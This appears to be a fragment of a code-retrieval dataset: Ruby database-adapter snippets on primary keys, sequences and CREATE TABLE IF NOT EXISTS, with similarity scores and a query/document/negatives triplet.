"def property_schema_statement(schema)\n statement = super\n statement << ' AUTO_INCREMENT' if supports_serial? && schema[:serial?]\n statement\n end",
"def primary_key_constraint_sql_fragment(_)\n 'PRIMARY KEY'\n end",
"def test_reset_empty_table_with_custom_pk_sequence\n @connection.exec_query(\"CREATE SEQUENCE widgets_seq\")\n @connection.exec_query(\"\n CREATE TABLE widgets (\n widgetid INT PRIMARY KEY DEFAULT nextval('widgets_seq'),\n name string\n )\n \")\n assert_equal 1, Widget.create(name: \"weather\").id\n end",
"def test_reset_empty_table_with_custom_pk_sequence\n @connection.exec_query(\"CREATE SEQUENCE widgets_seq\")\n @connection.exec_query(\"\n CREATE TABLE widgets (\n widgetid INT PRIMARY KEY DEFAULT nextval('widgets_seq'),\n name string\n )\n \")\n assert_equal 1, Widget.create(name: \"weather\").id\n end",
"def manually_autoincrement_id\n # no idea why this is necessary\n # ActiveRecord::StatementInvalid: PGError: ERROR: null value in column \"ID\" violates not-null constraint\n self.ID = Presto::Post.recent.first.ID.to_i + 1\n end",
"def default_sequence_name(table_name, pk = \"id\")\n nil\n end",
"def reset_pk_sequence!(table, pk = nil, sequence = nil)\n if ! pk || ! sequence\n default_pk, default_sequence = pk_and_sequence_for(table)\n pk ||= default_pk; sequence ||= default_sequence\n end\n if pk && sequence\n quoted_sequence = quote_column_name(sequence)\n\n select_value <<-end_sql, 'Reset Sequence'\n SELECT setval('#{quoted_sequence}', (SELECT COALESCE(MAX(#{quote_column_name pk})+(SELECT increment_by FROM #{quoted_sequence}), (SELECT min_value FROM #{quoted_sequence})) FROM #{quote_table_name(table)}), false)\n end_sql\n end\n end",
"def primary_key(table, field)\n execute \"ALTER TABLE #{table} ADD PRIMARY KEY(#{field_list(field)})\"\n end",
"def next_sequence_id\n last_sequence_id + 1\n end",
"def default_sequence_name(table_name, pk = nil) #:nodoc:\n result = serial_sequence(table_name, pk || 'id')\n return nil unless result\n Utils.extract_schema_qualified_name(result).to_s\n rescue ActiveRecord::StatementInvalid\n Redshift::Name.new(nil, \"#{table_name}_#{pk || 'id'}_seq\").to_s\n end",
"def create_sequence_statement(repository, property)\n \"CREATE SEQUENCE #{quote_column_name(sequence_name(repository, property))}\"\n end",
"def table\n Identity\n end",
"def table\n Identity\n end",
"def primary_key(table_name)\n pk_and_sequence_for(table_name)[0]\n rescue\n nil\n end",
"def primary_key(table_name)\n pk = super\n\n if pk == CockroachDBAdapter::DEFAULT_PRIMARY_KEY\n nil\n else\n pk\n end\n end",
"def pk_and_sequence_for(table)\n # try looking for a seq with a dependency on the table's primary key :\n result = select(<<-end_sql, 'PK and Serial Sequence')[0]\n SELECT attr.attname, seq.relname\n FROM pg_class seq,\n pg_attribute attr,\n pg_depend dep,\n pg_constraint cons\n WHERE seq.oid = dep.objid\n AND seq.relkind = 'S'\n AND attr.attrelid = dep.refobjid\n AND attr.attnum = dep.refobjsubid\n AND attr.attrelid = cons.conrelid\n AND attr.attnum = cons.conkey[1]\n AND cons.contype = 'p'\n AND dep.refobjid = '#{quote_table_name(table)}'::regclass\n end_sql\n\n if result.nil? || result.empty?\n # if that fails, try parsing the primary key's default value :\n result = select(<<-end_sql, 'PK and Custom Sequence')[0]\n SELECT attr.attname,\n CASE\n WHEN pg_get_expr(def.adbin, def.adrelid) !~* 'nextval' THEN NULL\n WHEN split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2) ~ '.' THEN\n substr(split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2),\n strpos(split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2), '.')+1)\n ELSE split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2)\n END as relname\n FROM pg_class t\n JOIN pg_attribute attr ON (t.oid = attrelid)\n JOIN pg_attrdef def ON (adrelid = attrelid AND adnum = attnum)\n JOIN pg_constraint cons ON (conrelid = adrelid AND adnum = conkey[1])\n WHERE t.oid = '#{quote_table_name(table)}'::regclass\n AND cons.contype = 'p'\n AND pg_get_expr(def.adbin, def.adrelid) ~* 'nextval|uuid_generate'\n end_sql\n end\n\n [ result['attname'], result['relname'] ]\n rescue\n nil\n end",
"def primary_key\n @primary_key ||= :id\n end",
"def next_val_sequence(name)\n if self.class.to_s =~ /ActiveRecord::ConnectionAdapters::Mysql/\n self.insert_sql(\"INSERT INTO %s_sequence VALUES(NULL)\" % name)\n else\n # the default insert_sql is nonsense, but jdbc_mysql doesn't override it\n self.execute(\"INSERT INTO %s_sequence VALUES(NULL)\" % name)\n end\n end",
"def primary_key\n 'id'\n end",
"def pk_and_sequence_for(table) #:nodoc:\n # First try looking for a sequence with a dependency on the\n # given table's primary key.\n result = select(<<-end_sql, 'PK and serial sequence')[0]\n SELECT attr.attname, seq.relname\n FROM pg_class seq,\n pg_attribute attr,\n pg_depend dep,\n pg_namespace name,\n pg_constraint cons\n WHERE seq.oid = dep.objid\n AND seq.relkind = 'S'\n AND attr.attrelid = dep.refobjid\n AND attr.attnum = dep.refobjsubid\n AND attr.attrelid = cons.conrelid\n AND attr.attnum = cons.conkey[1]\n AND cons.contype = 'p'\n AND dep.refobjid = '#{quote_table_name(table)}'::regclass\n end_sql\n\n if result.nil? or result.empty?\n # If that fails, try parsing the primary key's default value.\n # Support the 7.x and 8.0 nextval('foo'::text) as well as\n # the 8.1+ nextval('foo'::regclass).\n result = select(<<-end_sql, 'PK and custom sequence')[0]\n SELECT attr.attname,\n CASE\n WHEN split_part(def.adsrc, '''', 2) ~ '.' THEN\n substr(split_part(def.adsrc, '''', 2),\n strpos(split_part(def.adsrc, '''', 2), '.')+1)\n ELSE split_part(def.adsrc, '''', 2)\n END as relname\n FROM pg_class t\n JOIN pg_attribute attr ON (t.oid = attrelid)\n JOIN pg_attrdef def ON (adrelid = attrelid AND adnum = attnum)\n JOIN pg_constraint cons ON (conrelid = adrelid AND adnum = conkey[1])\n WHERE t.oid = '#{quote_table_name(table)}'::regclass\n AND cons.contype = 'p'\n AND def.adsrc ~* 'nextval'\n end_sql\n end\n\n [result[\"attname\"], result[\"relname\"]]\n rescue\n nil\n end",
"def save_primary_key_grip; end",
"def insert_sql(sql, name = nil, pk = nil, id_value = nil, sequence_name = nil)\n super\n\n exec_query('SELECT @@IDENTITY AS id')\n end",
"def primary_key(name, type = :primary_key, **options)\n column(name, type, **options.merge(primary_key: true))\n end",
"def primary_key\n @primary_key || 'id'\n end",
"def primary_key(name, type = :primary_key, options = {})\n return super\n end",
"def insert_sql(sql, name = nil, pri_key = nil, id_value = nil, sequence_name = nil)\n unless pri_key\n table_ref = extract_table_ref_from_insert_sql(sql)\n pri_key = primary_key(table_ref) if table_ref\n end\n\n if pri_key\n select_value(\"#{sql} RETURNING #{quote_column_name(pri_key)}\")\n else\n super\n end\n end",
"def default_sequence_name(table_name, pk = nil) #:nodoc:\n default_pk, default_seq = pk_and_sequence_for(table_name)\n default_seq || \"#{table_name}_#{pk || default_pk || 'id'}_seq\"\n end",
"def primary_key(table_name)\n 'id' # table.primary_key || 'id'\n end",
"def primary_key_name\n @primary_key_name ||= @connection.schema[@table_name.to_s][:primary_key]\n end",
"def reset_sequence_value(name, next_value = nil)\n create_sequence(name)\n unless next_value\n table, field = name.split('_$_')\n next_value = self.select_rows('SELECT MAX(%s) as max FROM %s' % [field, table]).first.first.to_i + 1\n end\n self.execute(\"ALTER TABLE %s_sequence AUTO_INCREMENT = %s\" % [name, next_value || 1])\n end",
"def last_insert_id(table, sequence_name) #:nodoc:\n Integer(select_value(\"SELECT currval('#{sequence_name}')\"))\n end",
"def primary_key\n \"#{quoted_table_name}.#{model_class.send :primary_key}\"\n end",
"def primary_key\n \"#{quoted_table_name}.#{model_class.send :primary_key}\"\n end",
"def reset_id\n ActiveRecord::Base.connection.execute(\\\n #'ALTER TABLE category AUTO_INCREMENT = 1')\n # \"DELETE FROM sqlite_sequence WHERE NAME = 'cate'\")\n # \"DELETE FROM sqlite_sequence WHERE NAME = 'categories'\")\n \"DELETE FROM categories; DELETE FROM sqlite_sequence WHERE NAME = 'categories'\")\n \n #\n # @adapter = ActiveRecord::Base.connection.adapter_name\n# \n # @key = maximum(primary_key)\n\n end",
"def add_big_primary_key(table_name, key_name)\n execute(<<-end_sql)\n alter table #{table_name} add column #{key_name} bigint not null auto_increment primary key\n end_sql\n end",
"def reset_sequence_numbers\n result = Database.connection.exec(\"SELECT table_name FROM information_schema.tables WHERE table_schema = 'public';\")\n table_names = result.map { |row| row.values_at('table_name')[0] }\n\n table_names_with_id_column = table_names.select do |table_name|\n result = Database.connection.exec(\"SELECT column_name FROM information_schema.columns WHERE table_name = '#{table_name}';\")\n column_names = result.map { |row| row.values_at('column_name')[0] }\n column_names.include?('id')\n end\n\n table_names_with_id_column.each do |table_name|\n result = Database.connection.exec(\"SELECT pg_get_serial_sequence('#{table_name}', 'id');\")\n sequence_name = result.getvalue(0, 0)\n Database.connection.exec(\"SELECT setval('#{sequence_name}', (select MAX(id) from #{table_name}));\")\n end\n end",
"def insert_statement(model, properties, serial)\n statement = \"\"\n # Check if there is a serial property being set directly\n require_identity_insert = !properties.empty? && properties.any? { |property| property.serial? }\n set_identity_insert(model, statement, true) if require_identity_insert\n statement << super\n set_identity_insert(model, statement, false) if require_identity_insert\n statement\n end",
"def primary_key(value=nil)\n self.primary_key = value unless value.nil?\n \n @primary_key ||= :id\n end",
"def force_primary_key(klass)\n # Automatically add an :oid serializable field if none is\n # defined and no other primary key is defined.\n if klass.primary_key == :oid and !klass.instance_attributes.include?(:oid)\n klass.attr_accessor :oid, Fixnum, :sql => primary_key_type\n end\n end",
"def primary_key(table_name)\n pk_and_sequence = pk_and_sequence_for(table_name)\n pk_and_sequence && pk_and_sequence.first\n end",
"def primary_key(table)\n pk_and_sequence = pk_and_sequence_for(table)\n pk_and_sequence && pk_and_sequence.first\n end",
"def insert_pk\n (f = opts[:from]) && !f.empty? && (t = f.first)\n case t\n when Symbol, String, SQL::Identifier, SQL::QualifiedIdentifier\n if pk = db.primary_key(t)\n Sequel::SQL::Identifier.new(pk)\n end\n end\n end",
"def convert_serial_to_identity(table, opts=OPTS)\n raise Error, \"convert_serial_to_identity is only supported on PostgreSQL 10.2+\" unless server_version >= 100002\n\n server = opts[:server]\n server_hash = server ? {:server=>server} : OPTS\n ds = dataset\n ds = ds.server(server) if server\n\n raise Error, \"convert_serial_to_identity requires superuser permissions\" unless ds.get{current_setting('is_superuser')} == 'on'\n\n table_oid = regclass_oid(table)\n im = input_identifier_meth\n unless column = (opts[:column] || ((sch = schema(table).find{|_, sc| sc[:primary_key] && sc[:auto_increment]}) && sch[0]))\n raise Error, \"could not determine column to convert from serial to identity automatically\"\n end\n column = im.call(column)\n\n column_num = ds.from(:pg_attribute).\n where(:attrelid=>table_oid, :attname=>column).\n get(:attnum)\n\n pg_class = Sequel.cast('pg_class', :regclass)\n res = ds.from(:pg_depend).\n where(:refclassid=>pg_class, :refobjid=>table_oid, :refobjsubid=>column_num, :classid=>pg_class, :objsubid=>0, :deptype=>%w'a i').\n select_map([:objid, Sequel.as({:deptype=>'i'}, :v)])\n\n case res.length\n when 0\n raise Error, \"unable to find related sequence when converting serial to identity\"\n when 1\n seq_oid, already_identity = res.first\n else\n raise Error, \"more than one linked sequence found when converting serial to identity\"\n end\n\n return if already_identity\n\n transaction(server_hash) do\n run(\"ALTER TABLE #{quote_schema_table(table)} ALTER COLUMN #{quote_identifier(column)} DROP DEFAULT\", server_hash)\n\n ds.from(:pg_depend).\n where(:classid=>pg_class, :objid=>seq_oid, :objsubid=>0, :deptype=>'a').\n update(:deptype=>'i')\n\n ds.from(:pg_attribute).\n where(:attrelid=>table_oid, :attname=>column).\n update(:attidentity=>'d')\n end\n\n remove_cached_schema(table)\n nil\n end",
"def primary_key\n '_id'\n end",
"def insert(sql, name = nil, pk = nil, id_value = nil, sequence_name = nil)\n table = sql.split(\" \", 4)[2]\n super || last_insert_id(table, sequence_name || default_sequence_name(table, pk))\n end",
"def orchestrate_primary_key\n id\n end",
"def quoted_primary_key\n @quoted_primary_key ||= connection.quote_column_name(primary_key)\n end",
"def save\n sql = <<-SQL\n INSERT INTO students (name, grade)\n VALUES (?,?)\n SQL\n\n DB[:conn].execute(sql, self.name, self.grade)\n\n @id = DB[:conn].execute(\"SELECT last_insert_rowid() FROM students\")[0][0]\nend",
"def primary_key!\n @primary_keys << @name\n end",
"def create\r\n if self.id.nil? && connection.prefetch_primary_key?(self.class.table_name)\r\n self.id = connection.next_sequence_value(self.class.sequence_name)\r\n end\r\n\r\n quoted_attributes = attributes_with_quotes\r\n\r\n statement = if quoted_attributes.empty?\r\n connection.empty_insert_statement(self.class.table_name)\r\n else\r\n \"INSERT INTO #{self.class.quoted_table_name} \" +\r\n \"(#{quoted_column_names.join(', ')}) \" +\r\n \"VALUES(#{quoted_attributes.values.join(', ')})\"\r\n end\r\n\r\n self.id = connection.insert(statement, \"#{self.class.name} Create\",\r\n self.class.primary_key, self.id, self.class.sequence_name)\r\n\r\n @new_record = false\r\n id\r\n end",
"def primary_key\n self.class.primary_key\n end",
"def primary_key\n self.class.primary_key\n end",
"def primary_key\n self.class.primary_key\n end",
"def increment_sequence_number\n @sequence_number += 1\n @sequence_number = 0 if @sequence_number > 0xFFFFFFFF\n end",
"def uses_sequence\n select_value(\"SELECT name FROM sqlite_master WHERE type='table' AND name='sqlite_sequence';\")\n end",
"def type_literal_generic_integer(column)\n column[:serial] ? :serial : super\n end",
"def type_literal_generic_integer(column)\n column[:serial] ? :serial : super\n end",
"def primary_key\n @primary_key\n end",
"def insert_pk\n if (f = opts[:from]) && !f.empty?\n case t = f.first\n when Symbol, String, SQL::Identifier, SQL::QualifiedIdentifier\n if pk = db.primary_key(t)\n pk\n end\n end\n end\n end",
"def schema_autoincrementing_primary_key?(schema)\n !!(schema[:primary_key] && schema[:auto_increment])\n end",
"def insert(*args)\n r = super\n if s = opts[:sequence]\n with_sql(\"SELECT #{literal(s)}.currval FROM dual\").single_value.to_i\n else\n r\n end\n end",
"def change_sequence(name, options = {})\n execute change_sequence_sql(name, options)\n end",
"def save\n sql = <<-SQL\n INSERT INTO #{self.table_name_for_insert} (#{self.col_names_for_insert})\n VALUES (#{self.values_for_insert})\n SQL\n\n DB[:conn].execute(sql)\n @id = DB[:conn].execute(\"SELECT last_insert_rowid() FROM #{self.table_name_for_insert}\")[0][0]\n end",
"def insert_statement(model, properties, serial)\n statement = \"INSERT INTO #{quote_name(model.storage_name(name))} \"\n\n custom_sequence = serial && serial.options[:sequence]\n\n if supports_default_values? && properties.empty? && !custom_sequence\n statement << \"(#{quote_name(serial.field)}) \" if serial\n statement << default_values_clause\n else\n # do not use custom sequence if identity field was assigned a value\n if custom_sequence && properties.include?(serial)\n custom_sequence = nil\n end\n statement << \"(\"\n if custom_sequence\n statement << \"#{quote_name(serial.field)}\"\n statement << \", \" unless properties.empty?\n end\n statement << \"#{properties.map { |p| quote_name(p.field) }.join(', ')}) \"\n statement << \"VALUES (\"\n if custom_sequence\n statement << \"#{quote_name(custom_sequence)}.NEXTVAL\"\n statement << \", \" unless properties.empty?\n end\n statement << \"#{(['?'] * properties.size).join(', ')})\"\n end\n\n if supports_returning? && serial\n statement << returning_clause(serial)\n end\n\n statement\n end",
"def pk_and_sequence_for(table) #:nodoc:\n result = query(<<-end_sql, 'PK and serial sequence')[0]\n SELECT columns.column_name, columns.column_default \n FROM primary_keys \n LEFT JOIN columns \n USING(table_name, column_name)\n WHERE primary_keys.table_name = '#{table_name.gsub(/(^\"|\"$)/,'')}'\n end_sql\n \n if result.length == 0\n return nil\n elsif result[0][1].nil?\n return nil\n else\n default_value = result[0][1]\n seq_name = default_value.match(/\\(\\'(\\w+)\\'\\)/).to_a.last\n return [result[0][0], seq_name]\n end\n rescue\n nil\n end",
"def property_schema_statement(schema)\n statement = super\n\n if schema.has_key?(:sequence_name)\n statement << \" DEFAULT nextval('#{schema[:sequence_name]}') NOT NULL\"\n end\n\n statement\n end",
"def primary_key(_table_name)\n []\n end",
"def last_insert_id(sequence_name)\n r = exec_query(\"SELECT currval('#{sequence_name}')\", 'SQL')\n Integer(r.rows.first.first)\n end",
"def sequence_number; end",
"def assign_tx_seq_num\n self.update(tx_seq_num: Order.max_tx_seq_num + 1) \n end",
"def primary_key_attribute\n :id\n end",
"def primary_key\n @primary_key ||= @klass.primary_key.to_s\n end",
"def primary_key\n fail NotImplementedError\n end",
"def create_sequence(repository, property)\n return if sequence_exists?(repository, property)\n execute(create_sequence_statement(repository, property))\n end"
] |
[
"0.71952075",
"0.71952075",
"0.71893656",
"0.71893656",
"0.70656824",
"0.6960461",
"0.69145495",
"0.69145495",
"0.68647623",
"0.68647623",
"0.68033075",
"0.67720366",
"0.65689373",
"0.6540689",
"0.65311176",
"0.6473395",
"0.6473395",
"0.642823",
"0.6426254",
"0.64066917",
"0.63104767",
"0.6309169",
"0.6242477",
"0.62400544",
"0.6203635",
"0.6189762",
"0.6166343",
"0.61524075",
"0.6147001",
"0.6147001",
"0.61204827",
"0.61091477",
"0.609349",
"0.6076748",
"0.6071671",
"0.6071224",
"0.603884",
"0.59536356",
"0.59536356",
"0.59508437",
"0.5927169",
"0.5903433",
"0.5897217",
"0.5889615",
"0.5864631",
"0.5854951",
"0.58529025",
"0.5830269",
"0.58155584",
"0.5776988",
"0.57764",
"0.5770577",
"0.57401407",
"0.5721618",
"0.5720996",
"0.5708285",
"0.5695692",
"0.5672711",
"0.5672711",
"0.5671217",
"0.5650326",
"0.5649192",
"0.5637172",
"0.5633245",
"0.56324863",
"0.5623073",
"0.5611988",
"0.56106746",
"0.5606156",
"0.55966324",
"0.5578386",
"0.5576882",
"0.557343",
"0.55698955",
"0.5566188",
"0.5559156",
"0.5544551",
"0.5544551",
"0.5544551",
"0.55349493",
"0.5531298",
"0.5529431",
"0.5529431",
"0.5519675",
"0.54994583",
"0.5490993",
"0.54741657",
"0.5461575",
"0.5437435",
"0.54358065",
"0.5434331",
"0.5433339",
"0.54229516",
"0.54216075",
"0.5419744",
"0.5409058",
"0.5408901",
"0.5405676",
"0.5405085",
"0.5398232"
] |
0.645073
|
17
|
The version of the PostgreSQL server, used for determining capability.
|
def server_version(server=nil)
return @server_version if @server_version
ds = dataset
ds = ds.server(server) if server
@server_version = swallow_database_error{ds.with_sql("SELECT CAST(current_setting('server_version_num') AS integer) AS v").single_value} || 0
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def server_version\n db.server_version(@opts[:server])\n end",
"def version\n @version ||= exec('SHOW server_version')[0]['server_version'].split[0]\n end",
"def get_server_version\n server_info[:server_version]\n end",
"def server_version; end",
"def server_version\n ServerVersion.new(server_info[\"version\"])\n end",
"def oracle_server_vernum()\n #This is a stub, used for indexing\n end",
"def target_postgresql_version; end",
"def server_version\n check_connection\n @protocol.server_version\n end",
"def postgresql_version\n 100000\n end",
"def server_version\n request(auth: false, expects: 200)['version']\n rescue => ex\n error { \"Server version exception\" }\n error { ex }\n nil\n end",
"def server_version\n server_info.present? ? @server_info[:parseServerVersion] : nil\n end",
"def postgresql_version\n if undecorated_connection.respond_to?(:postgresql_version)\n super\n else\n undecorated_connection.send(:postgresql_version)\n end\n end",
"def postgresql_version\n if undecorated_connection.respond_to?(:postgresql_version)\n super\n else\n undecorated_connection.send(:postgresql_version)\n end\n end",
"def server_pkg_name\n platform_family?('debian') ? \"postgresql-#{new_resource.version}\" : \"postgresql#{new_resource.version.delete('.')}-server\"\n end",
"def db_version\n migration_meta_node[:_db_version]\n end",
"def server_version(_server=nil)\n @server_version ||= super()\n end",
"def target_postgresql_version=(_arg0); end",
"def server_version\n call! :server_version\n end",
"def server_version(server=nil)\n @server_version ||= (synchronize(server){|conn| conn.info[:id]})\n end",
"def schema_version\n exec_one_result( \"SELECT schema_version FROM info\" )\n end",
"def version\n VERSION\n end",
"def version\n detect_product('GSA').version\n end",
"def version\n VERSION\n end",
"def database_version\n raise NoMethodError, \"Not implemented for this raw driver\"\n end",
"def version_number\n @version\n end",
"def server_version\n status['value']['build']['version']\n end",
"def version\n @version\n end",
"def version\n @db.send(:get_int_pragma, 'user_version')\n end",
"def version\n driver.getVersion\n end",
"def version\n return @version\n end",
"def version\n return @version\n end",
"def version\n return @version\n end",
"def version\n return @version\n end",
"def version\n return @version\n end",
"def version\n return @version\n end",
"def version\n return @version\n end",
"def version\n return @version\n end",
"def version\n return @version\n end",
"def version\n [@major_version, @minor_version].join('.')\n end",
"def version\n [ V1_4.raptor_version_major,\n V1_4.raptor_version_minor,\n V1_4.raptor_version_release ].join('.')\n end",
"def version\n @version ||= version_hex.to_s(16).chars.entries.join('.')\n end",
"def engine_version\n @dbi.engine_version\n end",
"def engine_version\n @dbi.engine_version\n end",
"def old_postgresql_datadir_version\n pg_version = old_postgres_data_dir/\"PG_VERSION\"\n pg_version.exist? && pg_version.read.chomp\n end",
"def version\n VERSION\n end",
"def version\n VERSION\n end",
"def version\n VERSION\n end",
"def platform_service_name(version = node.run_state['postgresql']['version'])\n case node['platform_family']\n when 'rhel', 'fedora'\n \"postgresql-#{version}\"\n when 'amazon'\n if node['virtualization']['system'] == 'docker'\n \"postgresql#{version.delete('.')}\"\n else\n \"postgresql-#{version}\"\n end\n else\n 'postgresql'\n end\n end",
"def compact_pg_version\n pg_version.gsub('.','')\n end",
"def version\n read_property 'Version'\n end",
"def engine_version\n stats.version\n end",
"def client_version\n ClientVersion\n end",
"def version\n @version ||= __determine_version\n end",
"def version_number\n return @version_number\n end",
"def fcv_ish\n if server_version >= '3.4' && !mongos?\n fcv\n else\n if short_server_version == '4.1'\n '4.2'\n else\n short_server_version\n end\n end\n end",
"def version\n case @version\n when Module\n \"#{@version::Major}.#{@version::Minor}.#{@version::Release}\"\n when Proc # not sure about this\n @version.call\n when NilClass\n 'unknown'\n else\n @version\n end\n end",
"def version\n return last_version if versionable?\n version_number\n end",
"def environment_version\n metadata[:environment_version]\n end",
"def version\n @version || 0\n end",
"def version\n self[:version]\n end",
"def client_meta_version(version)\n regexp = /^([0-9]+\\.[0-9]+\\.[0-9]+)(\\.?[a-z0-9.-]+)?$/\n match = version.match(regexp)\n return \"#{match[1]}p\" if (match[2])\n\n version\n end",
"def version\n cmd(COMMANDS[:version], 2)\n end",
"def version\n (version_from_class.to_f / 10).to_s\n end",
"def version\n @__version\n end",
"def version\n @table[:version] ||= Version::Number.new('0.0.0')\n end",
"def version\n options['version']\n end",
"def version\n ret = @client.call('Bugzilla.version')\n handle_faults(ret)\n ret['version']\n end",
"def mssql_version\n @mssql_version ||=\n begin\n query('SELECT @@version')[0][0] =~ /(\\d+)\\.(\\d+)\\.(\\d+).(\\d+)/\n [$1, $2, $3, $4]\n rescue\n [0, 0, 0, 0]\n end\n end",
"def version\n app = detect_product(GSA) || detect_product(GOOGLEPODCASTS)\n app.version\n end",
"def versionString()\n\t\t\t\treturn \"#{major}.#{minor}.#{build}\"\n\t\t\tend",
"def version\n \"rs_connect #{right_link_version} - RightLink's server importer (c) 2014 RightScale\"\n end",
"def major_version; end",
"def version\n fetch('vehicle.version')\n end",
"def current_version\n @version\n end",
"def version\n @version ||= create_version\n end",
"def version\n values = {}\n ring.servers.each do |server|\n values[server.name.to_s] = server.alive? ? server.request(:version) : nil\n end\n values\n end",
"def version\n version_property ? version_property.ruby_value : nil\n end",
"def puppetserver_version_on(host)\n result = on(host, 'puppetserver --version', accept_all_exit_codes: true)\n if result.exit_code.zero?\n matched = result.stdout.strip.scan(/\\d+\\.\\d+\\.\\d+/)\n return matched.first\n end\n nil\n end",
"def version\n if browser == \"Chrome\"\n chrome.version\n elsif product = detect_product(\"Version\")\n product.version\n else\n BuildVersions[build]\n end\n end",
"def version\n 1\n end",
"def perl_version\n `perl --version 2>&1`.match(/\\(v([\\d\\.]+)\\)/)[1]\n end",
"def version\n name.split('_')[1]\n end",
"def platform_version\n return @platform_version\n end",
"def app_version\n return @app_version\n end",
"def app_version\n return @app_version\n end",
"def version\n @context[:version]\n end",
"def version\n exec(:version).readline =~ /^gpg \\(GnuPG\\) (.*)$/ ? $1 : nil\n end",
"def version\n echo_rosh_command\n\n @version ||= adapter.current_version\n end",
"def engine_version\n endpoint.engine_version\n end",
"def version\n @version ||= '1.0'\n end",
"def version\n self.class.version\n end",
"def engine_version\n Agent.engine_version_for_user_agent string\n end",
"def calabash_server_version\n version = nil\n executables.each do |executable|\n version = strings(executable).server_version\n break if version\n end\n version\n end",
"def engine_version\n data[:engine_version]\n end",
"def engine_version\n data[:engine_version]\n end",
"def server\n @database.server\n end",
"def server\n @database.server\n end",
"def hypervisor_version\n output_ptr = FFI::MemoryPointer.new(:ulong)\n FFI::Libvirt.virConnectGetVersion(pointer, output_ptr)\n FFI::Libvirt::Util.parse_version_number(output_ptr.get_ulong(0))\n end",
"def version\n execute_string(\"-version\")\n end",
"def version\n versions.last.miq_semver.split(\".\").first + \".0.0\"\n end"
] |
[
"0.8236167",
"0.82214254",
"0.77873117",
"0.74867266",
"0.74571335",
"0.73964053",
"0.7312636",
"0.7275439",
"0.7234323",
"0.72188014",
"0.7165389",
"0.7121293",
"0.7120812",
"0.71062684",
"0.7072108",
"0.7003863",
"0.7002735",
"0.6965803",
"0.69554186",
"0.69160396",
"0.6834642",
"0.6760121",
"0.67354983",
"0.668943",
"0.6677263",
"0.6674097",
"0.6665022",
"0.6649005",
"0.6619632",
"0.6589865",
"0.6589865",
"0.6589865",
"0.6589865",
"0.6589865",
"0.6589865",
"0.6589865",
"0.6589865",
"0.6589865",
"0.65857345",
"0.65746427",
"0.65471363",
"0.6546658",
"0.6546658",
"0.6534584",
"0.6533424",
"0.6533424",
"0.6533424",
"0.65249187",
"0.6515641",
"0.6514041",
"0.65037894",
"0.65033764",
"0.64991164",
"0.64852005",
"0.6469573",
"0.6438663",
"0.6421838",
"0.64173675",
"0.6400705",
"0.63967",
"0.6384967",
"0.6373156",
"0.63695234",
"0.6343087",
"0.6339712",
"0.6336708",
"0.6325522",
"0.6303778",
"0.6303203",
"0.6296407",
"0.6287402",
"0.62726235",
"0.6268262",
"0.6267251",
"0.62547016",
"0.62520075",
"0.6234216",
"0.62325764",
"0.62285846",
"0.6223968",
"0.6221551",
"0.62203515",
"0.62153864",
"0.6204905",
"0.6204905",
"0.6203381",
"0.6192019",
"0.618432",
"0.6183588",
"0.61824566",
"0.61820054",
"0.6180807",
"0.6174003",
"0.6173591",
"0.6173591",
"0.6165258",
"0.6165258",
"0.61627465",
"0.61500204",
"0.61479557"
] |
0.7409582
|
5
|
PostgreSQL supports CREATE TABLE IF NOT EXISTS on 9.1+
|
def supports_create_table_if_not_exists?
server_version >= 90100
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def supports_create_table_if_not_exists?\n true\n end",
"def supports_create_table_if_not_exists?\n false\n end",
"def supports_drop_table_if_exists?\n supports_create_table_if_not_exists?\n end",
"def create_table?(*args, &block)\n create_table(*args, &block) unless table_exists?\n end",
"def supports_drop_table_if_exists?\n true\n end",
"def supports_drop_table_if_exists?\n true\n end",
"def create_table?(name, options=OPTS, &block)\n if options[:partition_of]\n create_table(name, options.merge!(:if_not_exists=>true), &block)\n return\n end\n\n super\n end",
"def create_table (table_name)\r\n\t\"CREATE TABLE IF NOT EXISTS \" + table_name + \r\n\t\"(\r\n\tid INTEGER PRIMARY KEY,\r\n\ttitle VARCHAR(255),\r\n\tcode VARCHAR(255)\r\n\t)\"\r\nend",
"def create_table?(*args, &block)\n if !db.table_exists?(model.table_name)\n create_table(*args, &block)\n end\n end",
"def create_table_prefix_sql(name, options)\n \"CREATE #{temporary_table_sql if options[:temp]}TABLE#{' IF NOT EXISTS' if options[:if_not_exists]} #{options[:temp] ? quote_identifier(name) : quote_schema_table(name)}\"\n end",
"def create_table!(*args, &block)\n drop_table?\n create_table(*args, &block)\n end",
"def create_cache_table(database_url_or_options = {}, options = {})\n @pg.exec(%{\n CREATE UNLOGGED TABLE #{@table_name} (\n key text UNIQUE NOT NULL,\n value bytea NULL\n );\n })\n return true\n end",
"def create_table\n unless table_exists?\n key_options = connection.internal_string_options_for_primary_key\n\n connection.create_table(table_name, id: false) do |t|\n t.string :key, key_options\n t.string :value\n t.timestamps\n end\n end\n end",
"def create!(db, colls = nil)\n db.in_transaction do |conn|\n raise StandardError.new(\"Schema #{name} already created!\") unless schema_tables(conn).empty?\n end\n\n osm2pgsql_exec db, \"'#{empty_file}'\", \"creating osm2pgsql schema\"\n end",
"def test_drop_table_if_exists\n connection.create_table(:testings)\n assert connection.table_exists?(:testings)\n connection.drop_table(:testings, if_exists: true)\n assert_not connection.table_exists?(:testings)\n end",
"def create_join_table?(hash, options=OPTS)\n if supports_create_table_if_not_exists? && options[:no_index]\n create_join_table(hash, options.merge(:if_not_exists=>true))\n elsif !table_exists?(join_table_name(hash, options))\n create_join_table(hash, options)\n end\n end",
"def create_products_table\n c = PGconn.new(:host => \"localhost\", :dbname => dbname)\n c.exec %q{\n CREATE TABLE products (\n id SERIAL PRIMARY KEY,\n name varchar(255),\n price decimal,\n description text\n );\n }\n c.close\nend",
"def create_book_condition(db)\r\n create_book_condition_cmd = <<-SQL\r\n CREATE TABLE IF NOT EXISTS book_condition(\r\n condition_id INTEGER PRIMARY KEY,\r\n condition_desc text(20)\r\n )\r\n SQL\r\n #create book_condition table\r\n db.execute(create_book_condition_cmd)\r\nend",
